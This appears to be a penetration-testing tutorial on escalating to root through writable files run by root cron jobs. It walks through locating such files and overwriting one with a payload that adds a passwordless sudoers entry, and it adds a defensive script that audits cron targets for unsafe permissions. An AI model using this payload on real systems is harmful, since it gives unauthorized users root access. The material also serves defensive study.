# Exploiting Misconfigured Cron Jobs

## Cron Jobs

* Linux implements task scheduling through a utility called Cron.
* Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.
* An application or script that has been configured to run repeatedly with Cron is known as a Cron job. Cron can be used to automate or repeat a wide variety of functions on a system, from daily backups to system upgrades and patches.
* The crontab file is a configuration file that is used by the Cron utility to store and track Cron jobs that have been created.

## Exploiting Misconfigured Cron Jobs

* Cron jobs can be run as any user on the system. This is an important factor to keep an eye on, as we will be targeting Cron jobs that have been configured to run as the “root” user.
* This is primarily because any script or command run by such a Cron job will run as the root user and will consequently provide us with root access.
* In order to elevate our privileges, we need to find and identify cron jobs scheduled by the root user, or the files being processed by those cron jobs.

## **Attack Flow: Gaining Privilege via Cron Jobs**

### **1. Identify Cron Jobs for the Current User**

Start by listing all cron jobs for the user account you have access to:

```bash
crontab -l
```

If no cron jobs are listed or you need to check system-wide cron jobs, proceed to the next step.

### **2. Search for Cron Job Files with Higher Privileges**

Look for files related to cron jobs that might be owned by higher-privileged users. Use the `grep` command to find references to these files:

```bash
grep -rnw /usr -e "<file_path>"
```

Replace `<file_path>` with the path to the cron job file you found. This command searches for occurrences of the file path in the `/usr` directory.

### **3. Inspect the Results**

Review the files listed by the `grep` command. Look for files that you can edit and that have an associated cron job.

### **4. Append Code to Gain Sudo Permissions**

If you find an editable file associated with a cron job, append the following code to it to grant yourself `sudo` permissions:

```bash
printf '#!/bin/bash\necho "<your_user> ALL=NOPASSWD:ALL" >> /etc/sudoers' > <vulnerable_file>
```

Replace `<your_user>` with your actual username and `<vulnerable_file>` with the path to the file you are modifying.

### **5. Wait for the Cron Job to Execute**

The cron job will run at its scheduled time. You need to wait for it to complete.

### **6. Verify Your Sudo Permissions**

After the cron job runs, check if you have gained `sudo` permissions:

```bash
sudo -l
```

If you see that you have `NOPASSWD` permissions, you have successfully escalated your privileges.
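
The misconfiguration this flow depends on, a root cron job whose script or directory a non-root user can write to, can be audited for directly. The script below is an added example, not part of the original notes; it assumes the system-crontab format with a user field (`/etc/crontab`, `/etc/cron.d/*`), and `TRUSTED_OWNER`, the function names and the fixture paths are hypothetical.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: flag root cron jobs whose targets
# a non-root user could modify. Assumes system-crontab format
# ("min hour dom mon dow user command..." or "@keyword user command...").
# TRUSTED_OWNER is a hypothetical override so the audit can be tried unprivileged.
TRUSTED_OWNER=${TRUSTED_OWNER:-root}

# Print each absolute path referenced by an entry that runs as root.
root_cron_targets() {
    awk 'NF == 0 || $1 ~ /^#/ || $1 ~ /=/ { next }   # blanks, comments, VAR=value
         { u = ($1 ~ /^@/) ? 2 : 6 }                  # index of the user field
         $u == "root" { for (i = u + 1; i <= NF; i++)
                            if ($i ~ /^\// && $i !~ /^\/dev\//) print $i }' "$@" | sort -u
}

# Exit 0 when the path or its parent directory is not owned by TRUSTED_OWNER
# or is writable by group or others (only the immediate parent is checked).
is_tamperable() {
    [ -n "$(find -H "$1" "$(dirname -- "$1")" -prune \
            \( ! -user "$TRUSTED_OWNER" -o -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Print one line per finding; return 1 if anything was found.
audit_cron() {
    findings=$(root_cron_targets "$@" | while IFS= read -r t; do
        if is_tamperable "$t"; then echo "TAMPERABLE: $t"; fi
    done)
    if [ -n "$findings" ]; then printf '%s\n' "$findings"; return 1; fi
}

# Constructed fixture: root jobs pointing at a 777 script and a 755 script.
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\n' | tee "$d/backup.sh" > "$d/rotate.sh"
    chmod 777 "$d/backup.sh"; chmod 755 "$d/rotate.sh"
    printf '%s\n' 'SHELL=/bin/sh' '# constructed sample entries' \
        "*/5 * * * * root $d/backup.sh > /dev/null 2>&1" \
        "@daily root $d/rotate.sh" \
        "0 3 * * * www-data $d/backup.sh" > "$d/crontab"
    ( TRUSTED_OWNER=$(id -u); audit_cron "$d/crontab" ) || true
    rm -rf "$d"
}
demo   # on a real host: audit_cron /etc/crontab /etc/cron.d/*
```

A finding is cleared by making the script and its directory root-owned and removing group and other write permission (`chown root:root`, `chmod go-w`).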

***


**`Hacker's Mantra:`**`Never underestimate the determination of a kid who is time-rich and cash-poor. - Cory Doctorow`

